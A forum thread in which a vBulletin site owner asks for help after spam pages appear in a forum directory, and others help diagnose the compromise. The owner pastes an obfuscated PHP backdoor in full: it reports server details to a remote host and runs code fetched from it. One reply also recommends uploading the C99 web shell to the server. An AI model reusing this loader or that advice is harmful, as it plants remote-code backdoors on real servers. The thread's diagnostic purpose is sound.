I cant figure this out myself and it's a bit alarming... I was just browsing through Google search results for my website and came across this Google Cache which includes this link to my website!! Now, when I go to that directory (/public_html/forum/admincp/control_examples/) on my FTP server I do not see a "3picsex.html" which is what this link is linked to! And the link is actually working! The only files I can see in that directory are the standard vBulletin files, including the empty "index.html" page and the .htaccess file. What is going on here! And how do I fix this?!
Maybe it's a mod_rewrite and the files are on a different folder. Are you using a nulled version of vbulletin? Those are known to be easier to hack. (Also, risky if your server is in the USA). Back up your files and restore the control_examples files with a previous backup. Also, change your password and check the file permissions.
Nulled Version? No, I have the latest vBulletin version, which is 3.8.2. I just upgraded last week as a matter of fact. The /control_examples/ folder is CHMOD 777 lol maybe that is my problem? What should it be?
Then post your problem here: http://www.vbulletin.com/forum/ Chmod 777 can be dangerous because gives all privileges to everyone. Try changing it to 755 and if everything works fine, then leave it like that.
I have already posted on vBulletin.com here and I'm currently in the middle of getting some help from them as well I replaced the files in the /control_examples/ folder with old files from a previous backup, and changed the CHOMD to 755 and that had seemed to fix the problem. If I tried going to that link it gave me a 404 page not found error... PERFECT right?! NOT... Now, about 1.5hrs later and that same link is working again!!!
Have you told this to your webhost? (if you use a shared server) Maybe it's the server and not your webpage...
That is a possibility, it is shared. I know its a brand new server too and I dont think there are many other websites on it (I think just one other site at the moment). I will have to tell them... they are usually on AIM, but they arent right now. Otherwise I would have already told them. I'm too lazy to open a support ticket and all that BS tonight LOL I noticed there was some random .php file that same directory. Check out the code: <? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="4bb073b44030a7184c8396397677c874") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?> PHP: ...pretty crazy looking. I found very similar .php files in other random directories inside my forum directory!
It is somebody trying to create traffic with your website through http://71.rssnews.ws/ its base64 encoded
sorry for the double post but for some reason its telling me that i have a sig link that doesn't exist so it won't let me edit my post... It also appends a bunch of stuff about your server to the URL. What it does with that info, I do not know.
Do you think it has to do what that .php file? There are about 5 or 6 more scattered throughout the /forum/ directory. ...I guess I should delete those, right?
Yes id delete those for sure. The issue is that if they managed to get those PHP files on your server they can also upload deadly PHP shells like C99 and R57, or in the worst case append more code to existing files. This is what i would do... You are probably dealing with a little script kiddy using the C99 shell. So go find a copy of this shell online and upload it to your server.. you will be amazed at what it can do. This is what it will look like... Now you see on the right hand side the green permissions? Find the files with "drwxdrwxdr-x" permissions those tell you what the hacker could have changed. So check those out! You say that you did a recent upgrade so they probably didn't get in through your forum VB is pretty secure. Probably cd'd from another site.
Thank you bartic for that information... thats more help/info than I have been able to get from vBulletin.com so far! I will look into this further and notify my webhost. Thanks again for your help! I'll let you know how I make out